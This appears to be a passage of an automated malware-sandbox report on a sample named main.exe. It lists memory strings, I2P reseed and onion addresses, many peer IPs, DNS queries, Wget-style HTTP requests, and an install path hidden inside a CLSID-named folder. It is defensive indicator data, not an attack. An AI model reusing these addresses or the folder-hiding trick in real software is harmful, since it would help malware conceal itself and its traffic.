                    Source: main.exe, 00000014.00000002.2559133821.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
                    Source: main.exe, 00000014.00000003.1930520488.0000013B4569B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Onion-Location: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
                    Source: main.exe, 00000014.00000002.2557742278.0000013B45297000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
                    Source: main.exe, 00000014.00000002.2557742278.0000013B45297000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Onion-Location: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
                    Source: main.exeString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,ht
                    Source: main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.onion.im/
                    Source: main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.onion.im/B
                    Source: main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
                    Source: main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.onion.im/
                    Source: main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.onion.im/B
                    Source: main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
                    Source: NCdDxWNe.20.drString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
                    Source: DNS query: reseed-pl.i2pd.xyz
                    Source: unknownDNS query: name: reseed.onion.im
                    Source: unknownNetwork traffic detected: IP country count 22
                    Source: global trafficTCP traffic: 192.168.2.4:49730 -> 45.200.148.158:1129
                    Source: global trafficTCP traffic: 192.168.2.4:49852 -> 78.162.217.132:23193
                    Source: global trafficTCP traffic: 192.168.2.4:49854 -> 76.26.184.38:11367
                    Source: global trafficTCP traffic: 192.168.2.4:49853 -> 95.158.36.98:30125
                    Source: global trafficTCP traffic: 192.168.2.4:49855 -> 78.22.234.134:19663
                    Source: global trafficTCP traffic: 192.168.2.4:49856 -> 83.6.222.32:4587
                    Source: global trafficTCP traffic: 192.168.2.4:49857 -> 24.60.181.65:16477
                    Source: global trafficTCP traffic: 192.168.2.4:49858 -> 217.156.67.239:26529
                    Source: global trafficTCP traffic: 192.168.2.4:49860 -> 46.138.247.227:45301
                    Source: global trafficTCP traffic: 192.168.2.4:49859 -> 94.131.171.105:26872
                    Source: global trafficTCP traffic: 192.168.2.4:49866 -> 96.245.131.50:20033
                    Source: global trafficTCP traffic: 192.168.2.4:49867 -> 24.128.131.37:19244
                    Source: global trafficTCP traffic: 192.168.2.4:49869 -> 185.177.216.199:16669
                    Source: global trafficTCP traffic: 192.168.2.4:49870 -> 173.209.166.184:57108
                    Source: global trafficTCP traffic: 192.168.2.4:49872 -> 86.45.126.166:13159
                    Source: global trafficTCP traffic: 192.168.2.4:49873 -> 175.215.255.118:31497
                    Source: global trafficTCP traffic: 192.168.2.4:49874 -> 88.209.121.106:62766
                    Source: global trafficTCP traffic: 192.168.2.4:49875 -> 193.148.16.211:26842
                    Source: global trafficTCP traffic: 192.168.2.4:49876 -> 5.161.229.21:30354
                    Source: global trafficTCP traffic: 192.168.2.4:49949 -> 89.223.52.84:27690
                    Source: global trafficTCP traffic: 192.168.2.4:50046 -> 134.16.78.198:29107
                    Source: global trafficTCP traffic: 192.168.2.4:50047 -> 139.59.231.96:11507
                    Source: global trafficTCP traffic: 192.168.2.4:50048 -> 73.31.50.204:11435
                    Source: global trafficTCP traffic: 192.168.2.4:50049 -> 193.233.193.76:4567
                    Source: global trafficTCP traffic: 192.168.2.4:50050 -> 95.31.23.9:17903
                    Source: global trafficTCP traffic: 192.168.2.4:50051 -> 79.119.11.221:13529
                    Source: global trafficTCP traffic: 192.168.2.4:50052 -> 72.199.129.69:28562
                    Source: global trafficTCP traffic: 192.168.2.4:50053 -> 184.65.173.183:21143
                    Source: global trafficTCP traffic: 192.168.2.4:50054 -> 23.137.250.43:24642
                    Source: global trafficTCP traffic: 192.168.2.4:50056 -> 46.139.242.51:14602
                    Source: global trafficTCP traffic: 192.168.2.4:50057 -> 120.26.116.232:15559
                    Source: global trafficTCP traffic: 192.168.2.4:50058 -> 174.119.206.85:32791
                    Source: global trafficUDP traffic: 192.168.2.4:14015 -> 150.230.127.230:10500
                    Source: global trafficUDP traffic: 192.168.2.4:14015 -> 218.156.39.195:34643
                    Source: global trafficUDP traffic: 192.168.2.4:14015 -> 95.105.66.5:4327
                    Source: global trafficUDP traffic: 192.168.2.4:14015 -> 73.114.39.41:10449
                    Source: global trafficUDP traffic: 192.168.2.4:14015 -> 135.181.93.228:24635
                    Source: global trafficUDP traffic: 192.168.2.4:14015 -> 72.83.161.95:59836
                    Source: global trafficUDP traffic: 192.168.2.4:14015 -> 185.121.12.251:25677
                    Source: global trafficUDP traffic: 192.168.2.4:14015 -> 99.252.122.69:15928
                    Source: global trafficUDP traffic: 192.168.2.4:14015 -> 98.16.145.157:14447
                    Source: global trafficUDP traffic: 192.168.2.4:14015 -> 87.106.66.194:28800
                    Source: global trafficUDP traffic: 192.168.2.4:14015 -> 184.144.18.148:5088
                    Source: global trafficUDP traffic: 192.168.2.4:14015 -> 188.211.91.73:18034
                    Source: global trafficUDP traffic: 192.168.2.4:14015 -> 94.177.106.53:53254
                    Source: global trafficUDP traffic: 192.168.2.4:14015 -> 91.82.213.104:21140
                    Source: global trafficUDP traffic: 192.168.2.4:14015 -> 46.209.176.184:17024
                    Source: global trafficUDP traffic: 192.168.2.4:14015 -> 88.228.207.122:16453
                    Source: global trafficUDP traffic: 192.168.2.4:14015 -> 73.27.22.30:11739
                    Source: global trafficUDP traffic: 192.168.2.4:14015 -> 87.219.13.126:23154
                    Source: global trafficUDP traffic: 192.168.2.4:14015 -> 138.74.168.219:27694
                    Source: global trafficUDP traffic: 192.168.2.4:14015 -> 207.246.88.73:16205
                    Source: global trafficUDP traffic: 192.168.2.4:14015 -> 77.238.224.240:17146
                    Source: global trafficUDP traffic: 192.168.2.4:14015 -> 112.16.103.31:10651
                    Source: global trafficUDP traffic: 192.168.2.4:14015 -> 73.155.122.99:17078
                    Source: global trafficUDP traffic: 192.168.2.4:10511 -> 136.60.17.104:21248
                    Source: global trafficUDP traffic: 192.168.2.4:10511 -> 85.23.104.222:15068
                    Source: global trafficUDP traffic: 192.168.2.4:10511 -> 217.24.233.6:14696
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FFE0E162A1A recv,WSAGetLastError,20_2_00007FFE0E162A1A
                    Source: global trafficHTTP traffic detected: GET https://reseed-pl.i2pd.xyz:443/i2pseeds.su3 HTTP/1.0User-Agent: Wget/1.11.4Connection: close
                    Source: global trafficHTTP traffic detected: GET https://reseed.i2pgit.org:443/i2pseeds.su3 HTTP/1.0User-Agent: Wget/1.11.4Connection: close
                    Source: global trafficHTTP traffic detected: GET https://reseed.diva.exchange:443/i2pseeds.su3 HTTP/1.0User-Agent: Wget/1.11.4Connection: close
                    Source: global trafficHTTP traffic detected: GET https://reseed.onion.im:443/i2pseeds.su3 HTTP/1.0User-Agent: Wget/1.11.4Connection: close
                    Source: global trafficDNS traffic detected: DNS query: reseed-pl.i2pd.xyz
                    Source: global trafficDNS traffic detected: DNS query: reseed.i2pgit.org
                    Source: global trafficDNS traffic detected: DNS query: reseed.diva.exchange
                    Source: global trafficDNS traffic detected: DNS query: reseed.onion.im
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 19:26:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-Encoding
                    Source: jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000003.1898592051.0000013B45248000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000014.00000003.1898541929.0000013B45243000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000003.2661057466.00000201EB4A8000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000003.2660987884.00000201EB4A3000.00000004.00000020.00020000.00000000.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.drString found in binary or memory: http://127.0.0.1:8118
                    Source: main.exe, 00000014.00000003.1898592051.0000013B45248000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000014.00000003.1898541929.0000013B45243000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:8118(
                    Source: main.exe, 0000001F.00000003.2661057466.00000201EB4A8000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000003.2660987884.00000201EB4A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:8118J?
                    Source: 80P.exeString found in binary or memory: http://digitalbush.com/projects/masked-input-plugin/#license)
                    Source: jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.drString found in binary or memory: http://identiguy.i2p/hosts.txt
                    Source: main.exe, 00000014.00000002.2557742278.0000013B45297000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
                    Source: main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935350679.00000201EB8FF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.dr, NCdDxWNe.20.drString found in binary or memory: http://reg.i2p/hosts.txt
                    Source: main.exe, 00000014.00000002.2557908253.0000013B4567C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://reg.i2p/hosts.txtL
                    Source: main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://reg.i2p/hosts.txtl
                    Source: main.exe, 00000014.00000002.2557742278.0000013B4520D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://reg.i2p/hosts.txtr
                    Source: jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.drString found in binary or memory: http://rus.i2p/hosts.txt
                    Source: main.exe, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.dr, NCdDxWNe.20.drString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt
                    Source: main.exe, 00000014.00000002.2557742278.0000013B4520D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt/
                    Source: main.exe, 00000014.00000002.2557742278.0000013B4520D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txtf
                    Source: main.exe, 00000014.00000002.2557742278.0000013B4520D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txttp://
                    Source: jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.drString found in binary or memory: http://stats.i2p/cgi-bin/newhosts.txt
                    Source: Amcache.hve.29.drString found in binary or memory: http://upx.sf.net
                    Source: 80P.exeString found in binary or memory: http://www.mozilla.org/editor/midasdemo/securityprefs.html
                    Source: main.exe, main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.drString found in binary or memory: https://banana.incognet.io/
                    Source: main.exe, main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.drString found in binary or memory: https://i2p.ghativega.in/
                    Source: main.exe, 00000014.00000003.1910940308.0000013B452A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i2p.ghativega.in/p/p_lib.c
                    Source: jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.drString found in binary or memory: https://i2p.mooo.com/netDb/
                    Source: main.exe, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.drString found in binary or memory: https://i2p.novg.net/
                    Source: main.exe, 00000014.00000002.2557742278.0000013B45238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i2p.novg.net/V
                    Source: jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.drString found in binary or memory: https://i2pd.readthedocs.io/en/latest/user-guide/configuration/
                    Source: main.exe, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.drString found in binary or memory: https://i2pseed.creativecowpat.net:8443/
                    Source: jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.drString found in binary or memory: https://legit-website.com/i2pseeds.su3
                    Source: jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.drString found in binary or memory: https://netdb.i2p2.no/
                    Source: main.exe, main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.drString found in binary or memory: https://reseed-fr.i2pd.xyz/
                    Source: main.exe, 00000014.00000003.1910940308.0000013B452A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed-fr.i2pd.xyz/p_lib.c
                    Source: main.exe, main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.drString found in binary or memory: https://reseed-pl.i2pd.xyz/
                    Source: main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed-pl.i2pd.xyz/p_lib.c
                    Source: main.exe, main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.drString found in binary or memory: https://reseed.diva.exchange/
                    Source: jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.drString found in binary or memory: https://reseed.i2p-projekt.de/
                    Source: main.exe, main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.drString found in binary or memory: https://reseed.i2pgit.org/
                    Source: main.exe, 00000014.00000003.1910940308.0000013B452A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.i2pgit.org//p_lib.c
                    Source: main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.i2pgit.org/A
                    Source: main.exe, main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.drString found in binary or memory: https://reseed.memcpy.io/
                    Source: main.exe, main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.drString found in binary or memory: https://reseed.onion.im/
                    Source: main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.onion.im/B
                    Source: main.exe, main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.drString found in binary or memory: https://reseed.stormycloud.org/
                    Source: main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.stormycloud.org/k
                    Source: main.exe, main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.drString found in binary or memory: https://reseed2.i2p.net/
                    Source: main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/hO
                    Source: jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557742278.0000013B4520D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000014.00000002.2557742278.0000013B45238000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000014.00000002.2559133821.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.drString found in binary or memory: https://www2.mk16.de/
                    Source: main.exe, 00000014.00000002.2557742278.0000013B45238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www2.mk16.de/(
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
